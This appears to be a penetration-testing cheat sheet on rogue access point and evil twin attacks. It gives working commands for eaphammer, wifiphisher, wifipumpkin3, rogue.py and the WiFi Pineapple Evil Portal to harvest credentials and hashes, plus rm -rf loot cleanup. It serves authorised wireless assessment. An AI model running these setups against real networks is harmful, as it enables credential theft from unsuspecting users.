Rogue Access Point and Evil Twin Attacks
Rogue access points and evil twins impersonate a legitimate network to capture credentials, harvest hashes or gain a foothold, and are especially effective against open and guest networks. This section covers open-network attacks, MANA, Wifiphisher, Wifipumpkin3, Airgeddon and the WiFi Pineapple.
Open Network Attacks
Open and guest networks are frequently the easiest foothold. Consider the following approaches when assessing them.
- MAC spoofing — investigate connected client MAC addresses and spoof one if the network restricts access by MAC.
- Brute force — captive portals can sometimes be brute forced.
- Client isolation — check whether clients are isolated before authenticating to the guest portal, and what else is reachable on the network.
- Captive portal spoofing — clone the captive portal (or host your own) on a rogue AP to harvest credentials.
- Hostile portal attack — instead of serving a captive portal, redirect users from HTTP to SMB to capture their hashes.
- Tunnelling — many guest networks do not restrict or monitor DNS, so the captive portal can sometimes be bypassed by tunnelling traffic over DNS to a server you control.
MAC Spoofing
sudo macchanger -s wlan0Rogue AP with MANA (Open Network)
sudo ./eaphammer --interface wlan0 \ --essid "Free WiFi" \ --channel 1 \ --cloaking full \ --mana \ --wpa-version 2 \ --mac-whitelist mac-whitelist.txt
# Hostile portal against an open networksudo ./eaphammer --interface wlan0 --essid "Free WiFi" --channel 1 --auth open --hostile-portalWifiphisher
# Rogue AP performing evil twin and KARMA attackssudo wifiphisher -aI wlan0 -eI eth0# -aI AP interface# -eI extensions interface# https://github.com/wifiphisher/wifiphisherWifipumpkin3
# https://github.com/P0cL4bs/wifipumpkin3sudo apt install libssl-dev libffi-dev build-essential python3-pyqt5git clone https://github.com/P0cL4bs/wifipumpkin3.gitcd wifipumpkin3sudo python3 setup.py installsudo pip install ping3
# Configure DNS for the rogue APsudo nano /etc/systemd/resolved.conf # DNS=8.8.8.8 and DNSStubListener=nosudo ln -sf /run/systemd/resolve/resolv.conf /etc/resolv.confRogue AP (Pass-Through to the Internet)
sudo airmon-ng check killsudo ip link set wlan0 up
sudo wifipumpkin3wp3 > set interface wlan0wp3 > set ssid "Free WiFi"wp3 > set proxy noproxywp3 > ignore pydns_serverwp3 > startRogue AP with a Captive Portal
sudo airmon-ng check killsudo ip link set wlan0 up
sudo wifipumpkin3wp3 > set interface wlan0wp3 > set ssid "Free WiFi"wp3 > set proxy captiveflaskwp3 > startAirgeddon
cd ~/tools/airgeddonsudo bash airgeddon.shRogue.py (Legacy)
rogue.py predates the Eaphammer / Wifipumpkin3 workflows above and is retained as an older alternative for standing up rogue APs.
# WPA-Personal rogue AP (requires the known password)sudo python ~/tools/rogue/rogue.py -i wlan0 -c 1 --auth wpa-personal --bssid AA:BB:CC:DD:EE:FF --essid 'CorpWiFi' --wpa 2 --internet --print-creds --wpa-passphrase '<passphrase>' --hostile-portal --hostile-mode responder
# WPA-Enterprise rogue APsudo python ~/tools/rogue/rogue.py -i wlan0 -c 1 --auth wpa-enterprise --bssid AA:BB:CC:DD:EE:FF --essid Corp-EAP --wpa 2 --internet --print-credsWiFi Pineapple
The Hak5 WiFi Pineapple is a dedicated hardware rogue-AP platform.
Setup and Connecting
# Connect the Pineapple to Kalisudo ip link set eth1 down # or whichever ethX appears in ifconfigsudo ip addr add 172.16.42.42/255.255.255.0 dev eth1sudo ip link set eth1 up
# Open the UI in a browser# http://172.16.42.1:1471/# Default credentials: root:hak5pineapple
# Connect the Pineapple to the internet over Wi-Fi:# 1. Settings -> Networking# 2. Click 'scan' under Wireless Client Mode# 3. Choose your Wi-Fi and connect with credentialsPineAP Suite (Open AP and Evil Portal)
# Open AP# - Connect the Pineapple to the internet as above# - Select the Open AP tab in PineAP Suite# - Create an open SSID (e.g. "Free WiFi") and uncheck 'hidden'# - Deselect 'Impersonate all networks' (this breaks the connection if using# Wireless Client Mode for internet access)# - In the Filtering tab select the Deny list (not the Allow list, unless you# intend to allow specific clients)
# Evil Portal# 1. With the Open AP set up as above# 2. Go to Modules -> Evil Portal# 3. Download and modify, or upload, an evil portal# 4. Click Start, then Start Web Server, then Activate Portal# 5. Connect to the SSID configured in Open AP to see the portal# 6. Click 'view log' next to the portal to see captured credentialsThe portal redirect can be edited in /pineapple/ui/modules/evilportal/assets/api/Portal.php, pointing the redirect() and onSuccess() handlers at the target organisation’s site (for example http://www.example.com).
Cleaning the Pineapple
cd /rootrm -rf elog enrollment.log log.db log.db-journal recon.db recon.db-journalcd /root/handshakes && rm -rf *cd /root/loot && rm -rf *
# Factory reset while keeping the current firmware versionfirstboot -y && reboot


